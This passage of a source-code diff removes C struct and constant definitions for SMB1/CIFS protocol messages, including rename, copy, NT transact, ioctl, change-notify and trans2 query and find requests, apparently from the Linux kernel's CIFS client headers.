+-} __attribute__((packed)) LOCK_RSP;
+-
+-typedef struct smb_com_rename_req {
+-	struct smb_hdr hdr;	/* wct = 1 */
+-	__le16 SearchAttributes;	/* target file attributes */
+-	__le16 ByteCount;
+-	__u8 BufferFormat;	/* 4 = ASCII or Unicode */
+-	unsigned char OldFileName[1];
+-	/* followed by __u8 BufferFormat2 */
+-	/* followed by NewFileName */
+-} __attribute__((packed)) RENAME_REQ;
+-
+-	/* copy request flags */
+-#define COPY_MUST_BE_FILE      0x0001
+-#define COPY_MUST_BE_DIR       0x0002
+-#define COPY_TARGET_MODE_ASCII 0x0004 /* if not set, binary */
+-#define COPY_SOURCE_MODE_ASCII 0x0008 /* if not set, binary */
+-#define COPY_VERIFY_WRITES     0x0010
+-#define COPY_TREE              0x0020
+-
+-typedef struct smb_com_copy_req {
+-	struct smb_hdr hdr;	/* wct = 3 */
+-	__u16 Tid2;
+-	__le16 OpenFunction;
+-	__le16 Flags;
+-	__le16 ByteCount;
+-	__u8 BufferFormat;	/* 4 = ASCII or Unicode */
+-	unsigned char OldFileName[1];
+-	/* followed by __u8 BufferFormat2 */
+-	/* followed by NewFileName string */
+-} __attribute__((packed)) COPY_REQ;
+-
+-typedef struct smb_com_copy_rsp {
+-	struct smb_hdr hdr;     /* wct = 1 */
+-	__le16 CopyCount;    /* number of files copied */
+-	__u16 ByteCount;    /* may be zero */
+-	__u8 BufferFormat;  /* 0x04 - only present if errored file follows */
+-	unsigned char ErrorFileName[1]; /* only present if error in copy */
+-} __attribute__((packed)) COPY_RSP;
+-
+-#define CREATE_HARD_LINK		0x103
+-#define MOVEFILE_COPY_ALLOWED		0x0002
+-#define MOVEFILE_REPLACE_EXISTING	0x0001
+-
+-typedef struct smb_com_nt_rename_req {	/* A5 - also used for create hardlink */
+-	struct smb_hdr hdr;	/* wct = 4 */
+-	__le16 SearchAttributes;	/* target file attributes */
+-	__le16 Flags;		/* spec says Information Level */
+-	__le32 ClusterCount;
+-	__le16 ByteCount;
+-	__u8 BufferFormat;	/* 4 = ASCII or Unicode */
+-	unsigned char OldFileName[1];
+-	/* followed by __u8 BufferFormat2 */
+-	/* followed by NewFileName */
+-} __attribute__((packed)) NT_RENAME_REQ;
+-
+-typedef struct smb_com_rename_rsp {
+-	struct smb_hdr hdr;	/* wct = 0 */
+-	__u16 ByteCount;	/* bct = 0 */
+-} __attribute__((packed)) RENAME_RSP;
+-
+-typedef struct smb_com_delete_file_req {
+-	struct smb_hdr hdr;	/* wct = 1 */
+-	__le16 SearchAttributes;
+-	__le16 ByteCount;
+-	__u8 BufferFormat;	/* 4 = ASCII */
+-	unsigned char fileName[1];
+-} __attribute__((packed)) DELETE_FILE_REQ;
+-
+-typedef struct smb_com_delete_file_rsp {
+-	struct smb_hdr hdr;	/* wct = 0 */
+-	__u16 ByteCount;	/* bct = 0 */
+-} __attribute__((packed)) DELETE_FILE_RSP;
+-
+-typedef struct smb_com_delete_directory_req {
+-	struct smb_hdr hdr;	/* wct = 0 */
+-	__le16 ByteCount;
+-	__u8 BufferFormat;	/* 4 = ASCII */
+-	unsigned char DirName[1];
+-} __attribute__((packed)) DELETE_DIRECTORY_REQ;
+-
+-typedef struct smb_com_delete_directory_rsp {
+-	struct smb_hdr hdr;	/* wct = 0 */
+-	__u16 ByteCount;	/* bct = 0 */
+-} __attribute__((packed)) DELETE_DIRECTORY_RSP;
+-
+-typedef struct smb_com_create_directory_req {
+-	struct smb_hdr hdr;	/* wct = 0 */
+-	__le16 ByteCount;
+-	__u8 BufferFormat;	/* 4 = ASCII */
+-	unsigned char DirName[1];
+-} __attribute__((packed)) CREATE_DIRECTORY_REQ;
+-
+-typedef struct smb_com_create_directory_rsp {
+-	struct smb_hdr hdr;	/* wct = 0 */
+-	__u16 ByteCount;	/* bct = 0 */
+-} __attribute__((packed)) CREATE_DIRECTORY_RSP;
+-
+-typedef struct smb_com_query_information_req {
+-	struct smb_hdr hdr;     /* wct = 0 */
+-	__le16 ByteCount;	/* 1 + namelen + 1 */
+-	__u8 BufferFormat;      /* 4 = ASCII */
+-	unsigned char FileName[1];
+-} __attribute__((packed)) QUERY_INFORMATION_REQ;
+-
+-typedef struct smb_com_query_information_rsp {
+-	struct smb_hdr hdr;     /* wct = 10 */
+-	__le16 attr;
+-	__le32  last_write_time;
+-	__le32 size;
+-	__u16  reserved[5];
+-	__le16 ByteCount;	/* bcc = 0 */
+-} __attribute__((packed)) QUERY_INFORMATION_RSP;
+-
+-typedef struct smb_com_setattr_req {
+-	struct smb_hdr hdr; /* wct = 8 */
+-	__le16 attr;
+-	__le16 time_low;
+-	__le16 time_high;
+-	__le16 reserved[5]; /* must be zero */
+-	__u16  ByteCount;
+-	__u8   BufferFormat; /* 4 = ASCII */
+-	unsigned char fileName[1];
+-} __attribute__((packed)) SETATTR_REQ;
+-
+-typedef struct smb_com_setattr_rsp {
+-	struct smb_hdr hdr;     /* wct = 0 */
+-	__u16 ByteCount;        /* bct = 0 */
+-} __attribute__((packed)) SETATTR_RSP;
+-
+-/* empty wct response to setattr */
+-
+-/*******************************************************/
+-/* NT Transact structure definitions follow            */
+-/* Currently only ioctl, acl (get security descriptor) */
+-/* and notify are implemented                          */
+-/*******************************************************/
+-typedef struct smb_com_ntransact_req {
+-	struct smb_hdr hdr; /* wct >= 19 */
+-	__u8 MaxSetupCount;
+-	__u16 Reserved;
+-	__le32 TotalParameterCount;
+-	__le32 TotalDataCount;
+-	__le32 MaxParameterCount;
+-	__le32 MaxDataCount;
+-	__le32 ParameterCount;
+-	__le32 ParameterOffset;
+-	__le32 DataCount;
+-	__le32 DataOffset;
+-	__u8 SetupCount; /* four setup words follow subcommand */
+-	/* SNIA spec incorrectly included spurious pad here */
+-	__le16 SubCommand; /* 2 = IOCTL/FSCTL */
+-	/* SetupCount words follow then */
+-	__le16 ByteCount;
+-	__u8 Pad[3];
+-	__u8 Parms[];
+-} __attribute__((packed)) NTRANSACT_REQ;
+-
+-typedef struct smb_com_ntransact_rsp {
+-	struct smb_hdr hdr;     /* wct = 18 */
+-	__u8 Reserved[3];
+-	__le32 TotalParameterCount;
+-	__le32 TotalDataCount;
+-	__le32 ParameterCount;
+-	__le32 ParameterOffset;
+-	__le32 ParameterDisplacement;
+-	__le32 DataCount;
+-	__le32 DataOffset;
+-	__le32 DataDisplacement;
+-	__u8 SetupCount;   /* 0 */
+-	__u16 ByteCount;
+-	/* __u8 Pad[3]; */
+-	/* parms and data follow */
+-} __attribute__((packed)) NTRANSACT_RSP;
+-
+-/* See MS-SMB 2.2.7.2.1.1 */
+-struct srv_copychunk {
+-	__le64 SourceOffset;
+-	__le64 DestinationOffset;
+-	__le32 CopyLength;
+-	__u32  Reserved;
+-} __packed;
+-
+-typedef struct smb_com_transaction_ioctl_req {
+-	struct smb_hdr hdr;	/* wct = 23 */
+-	__u8 MaxSetupCount;
+-	__u16 Reserved;
+-	__le32 TotalParameterCount;
+-	__le32 TotalDataCount;
+-	__le32 MaxParameterCount;
+-	__le32 MaxDataCount;
+-	__le32 ParameterCount;
+-	__le32 ParameterOffset;
+-	__le32 DataCount;
+-	__le32 DataOffset;
+-	__u8 SetupCount; /* four setup words follow subcommand */
+-	/* SNIA spec incorrectly included spurious pad here */
+-	__le16 SubCommand; /* 2 = IOCTL/FSCTL */
+-	__le32 FunctionCode;
+-	__u16 Fid;
+-	__u8 IsFsctl;  /* 1 = File System Control 0 = device control (IOCTL) */
+-	__u8 IsRootFlag; /* 1 = apply command to root of share (must be DFS) */
+-	__le16 ByteCount;
+-	__u8 Pad[3];
+-	__u8 Data[1];
+-} __attribute__((packed)) TRANSACT_IOCTL_REQ;
+-
+-typedef struct smb_com_transaction_compr_ioctl_req {
+-	struct smb_hdr hdr;	/* wct = 23 */
+-	__u8 MaxSetupCount;
+-	__u16 Reserved;
+-	__le32 TotalParameterCount;
+-	__le32 TotalDataCount;
+-	__le32 MaxParameterCount;
+-	__le32 MaxDataCount;
+-	__le32 ParameterCount;
+-	__le32 ParameterOffset;
+-	__le32 DataCount;
+-	__le32 DataOffset;
+-	__u8 SetupCount; /* four setup words follow subcommand */
+-	/* SNIA spec incorrectly included spurious pad here */
+-	__le16 SubCommand; /* 2 = IOCTL/FSCTL */
+-	__le32 FunctionCode;
+-	__u16 Fid;
+-	__u8 IsFsctl;  /* 1 = File System Control 0 = device control (IOCTL) */
+-	__u8 IsRootFlag; /* 1 = apply command to root of share (must be DFS) */
+-	__le16 ByteCount;
+-	__u8 Pad[3];
+-	__le16 compression_state;  /* See below for valid flags */
+-} __attribute__((packed)) TRANSACT_COMPR_IOCTL_REQ;
+-
+-/* compression state flags */
+-#define COMPRESSION_FORMAT_NONE		0x0000
+-#define COMPRESSION_FORMAT_DEFAULT	0x0001
+-#define COMPRESSION_FORMAT_LZNT1	0x0002
+-
+-typedef struct smb_com_transaction_ioctl_rsp {
+-	struct smb_hdr hdr;	/* wct = 19 */
+-	__u8 Reserved[3];
+-	__le32 TotalParameterCount;
+-	__le32 TotalDataCount;
+-	__le32 ParameterCount;
+-	__le32 ParameterOffset;
+-	__le32 ParameterDisplacement;
+-	__le32 DataCount;
+-	__le32 DataOffset;
+-	__le32 DataDisplacement;
+-	__u8 SetupCount;	/* 1 */
+-	__le16 ReturnedDataLen;
+-	__u16 ByteCount;
+-} __attribute__((packed)) TRANSACT_IOCTL_RSP;
+-
+-#define CIFS_ACL_OWNER 1
+-#define CIFS_ACL_GROUP 2
+-#define CIFS_ACL_DACL  4
+-#define CIFS_ACL_SACL  8
+-
+-typedef struct smb_com_transaction_qsec_req {
+-	struct smb_hdr hdr;     /* wct = 19 */
+-	__u8 MaxSetupCount;
+-	__u16 Reserved;
+-	__le32 TotalParameterCount;
+-	__le32 TotalDataCount;
+-	__le32 MaxParameterCount;
+-	__le32 MaxDataCount;
+-	__le32 ParameterCount;
+-	__le32 ParameterOffset;
+-	__le32 DataCount;
+-	__le32 DataOffset;
+-	__u8 SetupCount; /* no setup words follow subcommand */
+-	/* SNIA spec incorrectly included spurious pad here */
+-	__le16 SubCommand; /* 6 = QUERY_SECURITY_DESC */
+-	__le16 ByteCount; /* bcc = 3 + 8 */
+-	__u8 Pad[3];
+-	__u16 Fid;
+-	__u16 Reserved2;
+-	__le32 AclFlags;
+-} __attribute__((packed)) QUERY_SEC_DESC_REQ;
+-
+-
+-typedef struct smb_com_transaction_ssec_req {
+-	struct smb_hdr hdr;     /* wct = 19 */
+-	__u8 MaxSetupCount;
+-	__u16 Reserved;
+-	__le32 TotalParameterCount;
+-	__le32 TotalDataCount;
+-	__le32 MaxParameterCount;
+-	__le32 MaxDataCount;
+-	__le32 ParameterCount;
+-	__le32 ParameterOffset;
+-	__le32 DataCount;
+-	__le32 DataOffset;
+-	__u8 SetupCount; /* no setup words follow subcommand */
+-	/* SNIA spec incorrectly included spurious pad here */
+-	__le16 SubCommand; /* 3 = SET_SECURITY_DESC */
+-	__le16 ByteCount; /* bcc = 3 + 8 */
+-	__u8 Pad[3];
+-	__u16 Fid;
+-	__u16 Reserved2;
+-	__le32 AclFlags;
+-} __attribute__((packed)) SET_SEC_DESC_REQ;
+-
+-typedef struct smb_com_transaction_change_notify_req {
+-	struct smb_hdr hdr;     /* wct = 23 */
+-	__u8 MaxSetupCount;
+-	__u16 Reserved;
+-	__le32 TotalParameterCount;
+-	__le32 TotalDataCount;
+-	__le32 MaxParameterCount;
+-	__le32 MaxDataCount;
+-	__le32 ParameterCount;
+-	__le32 ParameterOffset;
+-	__le32 DataCount;
+-	__le32 DataOffset;
+-	__u8 SetupCount; /* four setup words follow subcommand */
+-	/* SNIA spec incorrectly included spurious pad here */
+-	__le16 SubCommand;/* 4 = Change Notify */
+-	__le32 CompletionFilter;  /* operation to monitor */
+-	__u16 Fid;
+-	__u8 WatchTree;  /* 1 = Monitor subdirectories */
+-	__u8 Reserved2;
+-	__le16 ByteCount;
+-/* 	__u8 Pad[3];*/
+-/*	__u8 Data[1];*/
+-} __attribute__((packed)) TRANSACT_CHANGE_NOTIFY_REQ;
+-
+-/* BB eventually change to use generic ntransact rsp struct
+-      and validation routine */
+-typedef struct smb_com_transaction_change_notify_rsp {
+-	struct smb_hdr hdr;	/* wct = 18 */
+-	__u8 Reserved[3];
+-	__le32 TotalParameterCount;
+-	__le32 TotalDataCount;
+-	__le32 ParameterCount;
+-	__le32 ParameterOffset;
+-	__le32 ParameterDisplacement;
+-	__le32 DataCount;
+-	__le32 DataOffset;
+-	__le32 DataDisplacement;
+-	__u8 SetupCount;   /* 0 */
+-	__u16 ByteCount;
+-	/* __u8 Pad[3]; */
+-} __attribute__((packed)) TRANSACT_CHANGE_NOTIFY_RSP;
+-/* Completion Filter flags for Notify */
+-#define FILE_NOTIFY_CHANGE_FILE_NAME    0x00000001
+-#define FILE_NOTIFY_CHANGE_DIR_NAME     0x00000002
+-#define FILE_NOTIFY_CHANGE_NAME         0x00000003
+-#define FILE_NOTIFY_CHANGE_ATTRIBUTES   0x00000004
+-#define FILE_NOTIFY_CHANGE_SIZE         0x00000008
+-#define FILE_NOTIFY_CHANGE_LAST_WRITE   0x00000010
+-#define FILE_NOTIFY_CHANGE_LAST_ACCESS  0x00000020
+-#define FILE_NOTIFY_CHANGE_CREATION     0x00000040
+-#define FILE_NOTIFY_CHANGE_EA           0x00000080
+-#define FILE_NOTIFY_CHANGE_SECURITY     0x00000100
+-#define FILE_NOTIFY_CHANGE_STREAM_NAME  0x00000200
+-#define FILE_NOTIFY_CHANGE_STREAM_SIZE  0x00000400
+-#define FILE_NOTIFY_CHANGE_STREAM_WRITE 0x00000800
+-
+-#define FILE_ACTION_ADDED		0x00000001
+-#define FILE_ACTION_REMOVED		0x00000002
+-#define FILE_ACTION_MODIFIED		0x00000003
+-#define FILE_ACTION_RENAMED_OLD_NAME	0x00000004
+-#define FILE_ACTION_RENAMED_NEW_NAME	0x00000005
+-#define FILE_ACTION_ADDED_STREAM	0x00000006
+-#define FILE_ACTION_REMOVED_STREAM	0x00000007
+-#define FILE_ACTION_MODIFIED_STREAM	0x00000008
+-
+-/* response contains array of the following structures */
+-struct file_notify_information {
+-	__le32 NextEntryOffset;
+-	__le32 Action;
+-	__le32 FileNameLength;
+-	__u8  FileName[];
+-} __attribute__((packed));
+-
+-/* For IO_REPARSE_TAG_SYMLINK */
+-struct reparse_symlink_data {
+-	__le32	ReparseTag;
+-	__le16	ReparseDataLength;
+-	__u16	Reserved;
+-	__le16	SubstituteNameOffset;
+-	__le16	SubstituteNameLength;
+-	__le16	PrintNameOffset;
+-	__le16	PrintNameLength;
+-	__le32	Flags;
+-	char	PathBuffer[];
+-} __attribute__((packed));
+-
+-/* Flag above */
+-#define SYMLINK_FLAG_RELATIVE 0x00000001
+-
+-/* For IO_REPARSE_TAG_NFS */
+-#define NFS_SPECFILE_LNK	0x00000000014B4E4C
+-#define NFS_SPECFILE_CHR	0x0000000000524843
+-#define NFS_SPECFILE_BLK	0x00000000004B4C42
+-#define NFS_SPECFILE_FIFO	0x000000004F464946
+-#define NFS_SPECFILE_SOCK	0x000000004B434F53
+-struct reparse_posix_data {
+-	__le32	ReparseTag;
+-	__le16	ReparseDataLength;
+-	__u16	Reserved;
+-	__le64	InodeType; /* LNK, FIFO, CHR etc. */
+-	char	PathBuffer[];
+-} __attribute__((packed));
+-
+-struct cifs_quota_data {
+-	__u32	rsrvd1;  /* 0 */
+-	__u32	sid_size;
+-	__u64	rsrvd2;  /* 0 */
+-	__u64	space_used;
+-	__u64	soft_limit;
+-	__u64	hard_limit;
+-	char	sid[1];  /* variable size? */
+-} __attribute__((packed));
+-
+-/* quota sub commands */
+-#define QUOTA_LIST_CONTINUE	    0
+-#define QUOTA_LIST_START	0x100
+-#define QUOTA_FOR_SID		0x101
+-
+-struct trans2_req {
+-	/* struct smb_hdr hdr precedes. Set wct = 14+ */
+-	__le16 TotalParameterCount;
+-	__le16 TotalDataCount;
+-	__le16 MaxParameterCount;
+-	__le16 MaxDataCount;
+-	__u8 MaxSetupCount;
+-	__u8 Reserved;
+-	__le16 Flags;
+-	__le32 Timeout;
+-	__u16 Reserved2;
+-	__le16 ParameterCount;
+-	__le16 ParameterOffset;
+-	__le16 DataCount;
+-	__le16 DataOffset;
+-	__u8 SetupCount;
+-	__u8 Reserved3;
+-	__le16 SubCommand; /* 1st setup word - SetupCount words follow */
+-	__le16 ByteCount;
+-} __attribute__((packed));
+-
+-struct smb_t2_req {
+-	struct smb_hdr hdr;
+-	struct trans2_req t2_req;
+-} __attribute__((packed));
+-
+-struct trans2_resp {
+-	/* struct smb_hdr hdr precedes. Note wct = 10 + setup count */
+-	__le16 TotalParameterCount;
+-	__le16 TotalDataCount;
+-	__u16 Reserved;
+-	__le16 ParameterCount;
+-	__le16 ParameterOffset;
+-	__le16 ParameterDisplacement;
+-	__le16 DataCount;
+-	__le16 DataOffset;
+-	__le16 DataDisplacement;
+-	__u8 SetupCount;
+-	__u8 Reserved1;
+-	/* SetupWords[SetupCount];
+-	__u16 ByteCount;
+-	__u16 Reserved2;*/
+-	/* data area follows */
+-} __attribute__((packed));
+-
+-struct smb_t2_rsp {
+-	struct smb_hdr hdr;
+-	struct trans2_resp t2_rsp;
+-} __attribute__((packed));
+-
+-/* PathInfo/FileInfo infolevels */
+-#define SMB_INFO_STANDARD                   1
+-#define SMB_SET_FILE_EA                     2
+-#define SMB_QUERY_FILE_EA_SIZE              2
+-#define SMB_INFO_QUERY_EAS_FROM_LIST        3
+-#define SMB_INFO_QUERY_ALL_EAS              4
+-#define SMB_INFO_IS_NAME_VALID              6
+-#define SMB_QUERY_FILE_BASIC_INFO       0x101
+-#define SMB_QUERY_FILE_STANDARD_INFO    0x102
+-#define SMB_QUERY_FILE_EA_INFO          0x103
+-#define SMB_QUERY_FILE_NAME_INFO        0x104
+-#define SMB_QUERY_FILE_ALLOCATION_INFO  0x105
+-#define SMB_QUERY_FILE_END_OF_FILEINFO  0x106
+-#define SMB_QUERY_FILE_ALL_INFO         0x107
+-#define SMB_QUERY_ALT_NAME_INFO         0x108
+-#define SMB_QUERY_FILE_STREAM_INFO      0x109
+-#define SMB_QUERY_FILE_COMPRESSION_INFO 0x10B
+-#define SMB_QUERY_FILE_UNIX_BASIC       0x200
+-#define SMB_QUERY_FILE_UNIX_LINK        0x201
+-#define SMB_QUERY_POSIX_ACL             0x204
+-#define SMB_QUERY_XATTR                 0x205  /* e.g. system EA name space */
+-#define SMB_QUERY_ATTR_FLAGS            0x206  /* append,immutable etc. */
+-#define SMB_QUERY_POSIX_PERMISSION      0x207
+-#define SMB_QUERY_POSIX_LOCK            0x208
+-/* #define SMB_POSIX_OPEN               0x209 */
+-/* #define SMB_POSIX_UNLINK             0x20a */
+-#define SMB_QUERY_FILE__UNIX_INFO2      0x20b
+-#define SMB_QUERY_FILE_INTERNAL_INFO    0x3ee
+-#define SMB_QUERY_FILE_ACCESS_INFO      0x3f0
+-#define SMB_QUERY_FILE_NAME_INFO2       0x3f1 /* 0x30 bytes */
+-#define SMB_QUERY_FILE_POSITION_INFO    0x3f6
+-#define SMB_QUERY_FILE_MODE_INFO        0x3f8
+-#define SMB_QUERY_FILE_ALGN_INFO        0x3f9
+-
+-
+-#define SMB_SET_FILE_BASIC_INFO	        0x101
+-#define SMB_SET_FILE_DISPOSITION_INFO   0x102
+-#define SMB_SET_FILE_ALLOCATION_INFO    0x103
+-#define SMB_SET_FILE_END_OF_FILE_INFO   0x104
+-#define SMB_SET_FILE_UNIX_BASIC         0x200
+-#define SMB_SET_FILE_UNIX_LINK          0x201
+-#define SMB_SET_FILE_UNIX_HLINK         0x203
+-#define SMB_SET_POSIX_ACL               0x204
+-#define SMB_SET_XATTR                   0x205
+-#define SMB_SET_ATTR_FLAGS              0x206  /* append, immutable etc. */
+-#define SMB_SET_POSIX_LOCK              0x208
+-#define SMB_POSIX_OPEN                  0x209
+-#define SMB_POSIX_UNLINK                0x20a
+-#define SMB_SET_FILE_UNIX_INFO2         0x20b
+-#define SMB_SET_FILE_BASIC_INFO2        0x3ec
+-#define SMB_SET_FILE_RENAME_INFORMATION 0x3f2 /* BB check if qpathinfo too */
+-#define SMB_FILE_ALL_INFO2              0x3fa
+-#define SMB_SET_FILE_ALLOCATION_INFO2   0x3fb
+-#define SMB_SET_FILE_END_OF_FILE_INFO2  0x3fc
+-#define SMB_FILE_MOVE_CLUSTER_INFO      0x407
+-#define SMB_FILE_QUOTA_INFO             0x408
+-#define SMB_FILE_REPARSEPOINT_INFO      0x409
+-#define SMB_FILE_MAXIMUM_INFO           0x40d
+-
+-/* Find File infolevels */
+-#define SMB_FIND_FILE_INFO_STANDARD       0x001
+-#define SMB_FIND_FILE_QUERY_EA_SIZE       0x002
+-#define SMB_FIND_FILE_QUERY_EAS_FROM_LIST 0x003
+-#define SMB_FIND_FILE_DIRECTORY_INFO      0x101
+-#define SMB_FIND_FILE_FULL_DIRECTORY_INFO 0x102
+-#define SMB_FIND_FILE_NAMES_INFO          0x103
+-#define SMB_FIND_FILE_BOTH_DIRECTORY_INFO 0x104
+-#define SMB_FIND_FILE_ID_FULL_DIR_INFO    0x105
+-#define SMB_FIND_FILE_ID_BOTH_DIR_INFO    0x106
+-#define SMB_FIND_FILE_UNIX                0x202
+-/* #define SMB_FIND_FILE_POSIX_INFO          0x064 */
+-
+-typedef struct smb_com_transaction2_qpi_req {
+-	struct smb_hdr hdr;	/* wct = 14+ */
+-	__le16 TotalParameterCount;
+-	__le16 TotalDataCount;
+-	__le16 MaxParameterCount;
+-	__le16 MaxDataCount;
+-	__u8 MaxSetupCount;
+-	__u8 Reserved;
+-	__le16 Flags;
+-	__le32 Timeout;
+-	__u16 Reserved2;
+-	__le16 ParameterCount;
+-	__le16 ParameterOffset;
+-	__le16 DataCount;
+-	__le16 DataOffset;
+-	__u8 SetupCount;
+-	__u8 Reserved3;
+-	__le16 SubCommand;	/* one setup word */
+-	__le16 ByteCount;
+-	__u8 Pad;
+-	__le16 InformationLevel;
+-	__u32 Reserved4;
+-	char FileName[1];
+-} __attribute__((packed)) TRANSACTION2_QPI_REQ;
+-
+-typedef struct smb_com_transaction2_qpi_rsp {
+-	struct smb_hdr hdr;	/* wct = 10 + SetupCount */
+-	struct trans2_resp t2;
+-	__u16 ByteCount;
+-	__u16 Reserved2; /* parameter word is present for infolevels > 100 */
+-} __attribute__((packed)) TRANSACTION2_QPI_RSP;
+-
+-typedef struct smb_com_transaction2_spi_req {
+-	struct smb_hdr hdr;	/* wct = 15 */
+-	__le16 TotalParameterCount;
+-	__le16 TotalDataCount;
+-	__le16 MaxParameterCount;
+-	__le16 MaxDataCount;
+-	__u8 MaxSetupCount;
+-	__u8 Reserved;
+-	__le16 Flags;
+-	__le32 Timeout;
+-	__u16 Reserved2;
+-	__le16 ParameterCount;
+-	__le16 ParameterOffset;
+-	__le16 DataCount;
+-	__le16 DataOffset;
+-	__u8 SetupCount;
+-	__u8 Reserved3;
+-	__le16 SubCommand;	/* one setup word */
+-	__le16 ByteCount;
+-	__u8 Pad;
+-	__u16 Pad1;
+-	__le16 InformationLevel;
+-	__u32 Reserved4;
+-	char FileName[1];
+-} __attribute__((packed)) TRANSACTION2_SPI_REQ;
+-
+-typedef struct smb_com_transaction2_spi_rsp {
+-	struct smb_hdr hdr;	/* wct = 10 + SetupCount */
+-	struct trans2_resp t2;
+-	__u16 ByteCount;
+-	__u16 Reserved2; /* parameter word is present for infolevels > 100 */
+-} __attribute__((packed)) TRANSACTION2_SPI_RSP;
+-
+-struct set_file_rename {
+-	__le32 overwrite;   /* 1 = overwrite dest */
+-	__u32 root_fid;   /* zero */
+-	__le32 target_name_len;
+-	char  target_name[];  /* Must be unicode */
+-} __attribute__((packed));
+-
+-struct smb_com_transaction2_sfi_req {
+-	struct smb_hdr hdr;	/* wct = 15 */
+-	__le16 TotalParameterCount;
+-	__le16 TotalDataCount;
+-	__le16 MaxParameterCount;
+-	__le16 MaxDataCount;
+-	__u8 MaxSetupCount;
+-	__u8 Reserved;
+-	__le16 Flags;
+-	__le32 Timeout;
+-	__u16 Reserved2;
+-	__le16 ParameterCount;
+-	__le16 ParameterOffset;
+-	__le16 DataCount;
+-	__le16 DataOffset;
+-	__u8 SetupCount;
+-	__u8 Reserved3;
+-	__le16 SubCommand;	/* one setup word */
+-	__le16 ByteCount;
+-	__u8 Pad;
+-	__u16 Pad1;
+-	__u16 Fid;
+-	__le16 InformationLevel;
+-	__u16 Reserved4;
+-	__u8  payload[];
+-} __attribute__((packed));
+-
+-struct smb_com_transaction2_sfi_rsp {
+-	struct smb_hdr hdr;	/* wct = 10 + SetupCount */
+-	struct trans2_resp t2;
+-	__u16 ByteCount;
+-	__u16 Reserved2;	/* parameter word reserved -
+-					present for infolevels > 100 */
+-} __attribute__((packed));
+-
+-struct smb_t2_qfi_req {
+-	struct	smb_hdr hdr;
+-	struct	trans2_req t2;
+-	__u8	Pad;
+-	__u16	Fid;
+-	__le16	InformationLevel;
+-} __attribute__((packed));
+-
+-struct smb_t2_qfi_rsp {
+-	struct smb_hdr hdr;     /* wct = 10 + SetupCount */
+-	struct trans2_resp t2;
+-	__u16 ByteCount;
+-	__u16 Reserved2;        /* parameter word reserved -
+-				   present for infolevels > 100 */
+-} __attribute__((packed));
+-
+-/*
+- * Flags on T2 FINDFIRST and FINDNEXT
+- */
+-#define CIFS_SEARCH_CLOSE_ALWAYS  0x0001
+-#define CIFS_SEARCH_CLOSE_AT_END  0x0002
+-#define CIFS_SEARCH_RETURN_RESUME 0x0004
+-#define CIFS_SEARCH_CONTINUE_FROM_LAST 0x0008
+-#define CIFS_SEARCH_BACKUP_SEARCH 0x0010
+-
+-/*
+- * Size of the resume key on FINDFIRST and FINDNEXT calls
+- */
+-#define CIFS_SMB_RESUME_KEY_SIZE 4
+-
+-typedef struct smb_com_transaction2_ffirst_req {
+-	struct smb_hdr hdr;	/* wct = 15 */
+-	__le16 TotalParameterCount;
+-	__le16 TotalDataCount;
+-	__le16 MaxParameterCount;
+-	__le16 MaxDataCount;
+-	__u8 MaxSetupCount;
+-	__u8 Reserved;
+-	__le16 Flags;
+-	__le32 Timeout;
+-	__u16 Reserved2;
+-	__le16 ParameterCount;
+-	__le16 ParameterOffset;
+-	__le16 DataCount;
+-	__le16 DataOffset;
+-	__u8 SetupCount;	/* one */
+-	__u8 Reserved3;
+-	__le16 SubCommand;	/* TRANS2_FIND_FIRST */
+-	__le16 ByteCount;
+-	__u8 Pad;
+-	__le16 SearchAttributes;
+-	__le16 SearchCount;
+-	__le16 SearchFlags;
+-	__le16 InformationLevel;
+-	__le32 SearchStorageType;
+-	char FileName[1];
+-} __attribute__((packed)) TRANSACTION2_FFIRST_REQ;
+-
+-typedef struct smb_com_transaction2_ffirst_rsp {
+-	struct smb_hdr hdr;	/* wct = 10 */
+-	struct trans2_resp t2;
+-	__u16 ByteCount;
+-} __attribute__((packed)) TRANSACTION2_FFIRST_RSP;
+-
+-typedef struct smb_com_transaction2_ffirst_rsp_parms {
+-	__u16 SearchHandle;
+-	__le16 SearchCount;
+-	__le16 EndofSearch;
+-	__le16 EAErrorOffset;
+-	__le16 LastNameOffset;
+-} __attribute__((packed)) T2_FFIRST_RSP_PARMS;
+-
+-typedef struct smb_com_transaction2_fnext_req {
+-	struct smb_hdr hdr;	/* wct = 15 */
+-	__le16 TotalParameterCount;
+-	__le16 TotalDataCount;
+-	__le16 MaxParameterCount;
+-	__le16 MaxDataCount;
+-	__u8 MaxSetupCount;
+-	__u8 Reserved;
+-	__le16 Flags;
+-	__le32 Timeout;
+-	__u16 Reserved2;
+-	__le16 ParameterCount;
+-	__le16 ParameterOffset;
+-	__le16 DataCount;
+-	__le16 DataOffset;
+-	__u8 SetupCount;	/* one */
+-	__u8 Reserved3;
+-	__le16 SubCommand;	/* TRANS2_FIND_NEXT */
+-	__le16 ByteCount;
+-	__u8 Pad;
+-	__u16 SearchHandle;
+-	__le16 SearchCount;
+-	__le16 InformationLevel;
+-	__u32 ResumeKey;
+-	__le16 SearchFlags;
+-	char ResumeFileName[];
+-} __attribute__((packed)) TRANSACTION2_FNEXT_REQ;
+-
+-typedef struct smb_com_transaction2_fnext_rsp {
+-	struct smb_hdr hdr;	/* wct = 10 */
+-	struct trans2_resp t2;
+-	__u16 ByteCount;
+-} __attribute__((packed)) TRANSACTION2_FNEXT_RSP;
+-
+-typedef struct smb_com_transaction2_fnext_rsp_parms {
+-	__le16 SearchCount;
+-	__le16 EndofSearch;
+-	__le16 EAErrorOffset;
+-	__le16 LastNameOffset;
+-} __attribute__((packed)) T2_FNEXT_RSP_PARMS;
+-
+-/* QFSInfo Levels */
+-#define SMB_INFO_ALLOCATION         1
+-#define SMB_INFO_VOLUME             2
+-#define SMB_QUERY_FS_VOLUME_INFO    0x102
+-#define SMB_QUERY_FS_SIZE_INFO      0x103
+-#define SMB_QUERY_FS_DEVICE_INFO    0x104
+-#define SMB_QUERY_FS_ATTRIBUTE_INFO 0x105
+-#define SMB_QUERY_CIFS_UNIX_INFO    0x200
+-#define SMB_QUERY_POSIX_FS_INFO     0x201
+-#define SMB_QUERY_POSIX_WHO_AM_I    0x202
+-#define SMB_REQUEST_TRANSPORT_ENCRYPTION 0x203
+-#define SMB_QUERY_FS_PROXY          0x204 /* WAFS enabled. Returns structure
+-					    FILE_SYSTEM__UNIX_INFO to tell
+-					    whether new NTIOCTL available
+-					    (0xACE) for WAN friendly SMB
+-					    operations to be carried */
+-#define SMB_QUERY_LABEL_INFO        0x3ea
+-#define SMB_QUERY_FS_QUOTA_INFO     0x3ee
+-#define SMB_QUERY_FS_FULL_SIZE_INFO 0x3ef
+-#define SMB_QUERY_OBJECTID_INFO     0x3f0
+-
